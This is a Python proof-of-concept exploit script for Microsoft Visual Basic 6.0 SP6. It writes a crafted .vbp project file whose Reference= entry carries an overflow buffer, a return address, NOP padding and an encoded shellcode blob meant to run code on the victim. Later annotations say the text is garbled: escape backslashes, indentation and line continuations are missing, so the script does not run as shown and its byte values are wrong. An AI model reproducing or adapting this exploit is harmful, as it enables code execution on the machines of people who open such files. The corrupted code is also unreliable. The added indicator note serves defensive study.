# Title : Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution Exploit
# Published : 2007-09-19
# Author : shinnai
#usage: vbexploit.py FileName.vbp
import sys
# Banner block: author commentary printed before anything else happens.
# These are Python 2 `print` statements (no parentheses), so the file does
# not run under Python 3 as written. Strings are reproduced verbatim; the
# stray trailing "n" on several lines ("orgn", "4361n", 'said:n') appears to
# be a "\n" escape whose backslash was lost when the page was reproduced.
print "--------------------------------------------------------------------------"
print " [PoC_2] Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution "
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.orgn"
print " based on Koshi exploit"
print " http://www.milw0rm.com/exploits/4361n"
print " I try his exploit on Windows XP Pro SP2 Ita, full patched and it doesn't"
print " work, but he said:n"
print ' "# ...backwards..if you don' + "'t" + ' know why, then gtfo."n'
print " ok, now I know why brotha, I got this exception:n"
print ' "Access violation when writing to [63636363]"n'
print " so I search another way to get exploit working but I need to do some"
print ' changes to memory address ("00" became "20") and nop ("90" became "3F").'
print " Well, here it is a PoC_2 and if it doesn't work and" + ' "you don' + "'t know why,"
print ' then"' + "... feel free to ask ;)n"
print " dedicated to all Italian vb6 programmers... be safe bros"
print "--------------------------------------------------------------------------"
# Pieces that are later concatenated into the oversized `Reference=` value of
# the generated .vbp file (see the try block below).
# NOTE(review): as reproduced on this page every "x.." literal is missing the
# backslash of a "\x.." escape, so these strings are plain ASCII characters
# (x, 3, 7, ...) rather than the byte values the inline comments describe.
# The same applies to the shellcode block further down.
buff = "A" * 494          # 494-byte filler placed before the value the author labels EIP
EIP = "x37x17x8Bx60"; #call ESP from VBSCC.DLL esp, you can (or must) change as you like
buff2 = "A" * 12          # 12-byte filler between EIP and RW_Memory
RW_Memory = "x20x20x01x20" #patched writeable memory address "x00x00x01x00"
nop = "x3Fx3Fx3Fx3F" #patched nop "x90"
# The right-hand side of this assignment starts on the following line with no
# line continuation, and the `+`-terminated lines that follow are likewise not
# continued or parenthesised, so Python rejects the file with a SyntaxError
# before any of it runs (consistent with a line-continuation "\" having been
# stripped in reproduction). The payload body is not decoded or described on
# this page; treat it as an opaque blob supplied by the author.
shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"+
"x42x50x42x30x42x50x4bx38x45x44x4ex43x4bx38x4ex47"+
"x45x30x4ax47x41x30x4fx4ex4bx48x4fx54x4ax41x4bx38"+
"x4fx55x42x52x41x30x4bx4ex49x54x4bx48x46x33x4bx48"+
"x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c"+
"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+
"x46x4fx4bx43x46x35x46x52x46x30x45x37x45x4ex4bx58"+
"x4fx45x46x42x41x50x4bx4ex48x46x4bx48x4ex30x4bx44"+
"x4bx48x4fx35x4ex41x41x30x4bx4ex4bx38x4ex51x4bx38"+
"x41x50x4bx4ex49x38x4ex45x46x32x46x50x43x4cx41x33"+
"x42x4cx46x46x4bx48x42x34x42x33x45x38x42x4cx4ax47"+
"x4ex30x4bx38x42x34x4ex50x4bx58x42x47x4ex41x4dx4a"+
"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx48x42x48x42x4b"+
"x42x30x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x33"+
"x48x4fx42x46x48x35x49x38x4ax4fx43x58x42x4cx4bx37"+
"x42x55x4ax36x42x4fx4cx58x46x50x4fx35x4ax36x4ax59"+
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x56x41x56"+
"x4ex46x43x56x50x32x45x46x4ax37x45x36x42x50x5a"
# Assemble the text of a VB6 project (.vbp) file and write it to the path
# given as the first command-line argument; that same argument is also used
# verbatim as the project's `Name=` value.
# As reproduced here the body of the try/except is at column 0 (indentation
# lost), `vb_proj =` is followed by a line break with no continuation, and the
# 'n' ending each key=value fragment is a "\n" whose backslash was stripped —
# all of which make this text a SyntaxError as shown.
# Defender's note: the carrier is the `Reference=` entry — a normal-looking
# OLE Automation (stdole2.tlb) reference immediately followed by buff (494 x
# "A"), EIP, buff2, RW_Memory, nop, shellcode and nop. A .vbp whose
# `Reference=` value is far longer than a typical library reference, or that
# contains long runs of a single repeated character, is the on-disk indicator
# this generator would leave.
try:
vb_proj =
'Type=Exen'+
'Reference=*G{00020430-0000-0000-C000-000000000046}#2.0#0#......WINDOWS'+
'system32stdole2.tlb#OLE Automation' + buff + EIP + buff2 + RW_Memory + nop + shellcode + nop +
'nStartup="Sub Main"n'+
'Command32=""n'+
'Name=' + sys.argv[1]+
'nHelpContextID="0"n'+
'CompatibleMode="0"n'+
'MajorVer=1n'+
'MinorVer=0n'+
'RevisionVer=0n'+
'AutoIncrementVer=0n'+
'ServerSupportFiles=0n'+
'VersionCompanyName="xxx"n'+
'CompilationType=0n'+
'OptimizationType=0n'+
'FavorPentiumPro(tm)=0n'+
'CodeViewDebugInfo=0n'+
'NoAliasing=0n'+
'BoundsCheck=0n'+
'OverflowCheck=0n'+
'FlPointCheck=0n'+
'FDIVCheck=0n'+
'UnroundedFP=0n'+
'StartMode=0n'+
'Unattended=0n'+
'Retained=0n'+
'ThreadPerObject=0n'+
'MaxNumberOfThreads=1nn'+
'[MS Transaction Server]n'+
'AutoRefresh=1'
# Output path is taken unvalidated from argv[1]; opened in text mode 'w',
# which truncates any existing file at that path.
out_file = open(sys.argv[1],'w')
out_file.write(vb_proj)
out_file.close()
print "nFILE CREATION COMPLETED!n"
# Bare except: an IndexError from a missing argv[1] and any I/O error from
# open()/write() (e.g. an unwritable path) are all reported as the same usage
# message, so the real cause is hidden. Note the usage text says "exploit.py"
# while the header comment at the top of the file says "vbexploit.py".
except:
print " n -------------------------------------"
print " Usage: exploit.py FileName.vbp"
print " -------------------------------------"
print "nAN ERROR OCCURS DURING FILE CREATION!"
# www.Syue.com [2007-09-19]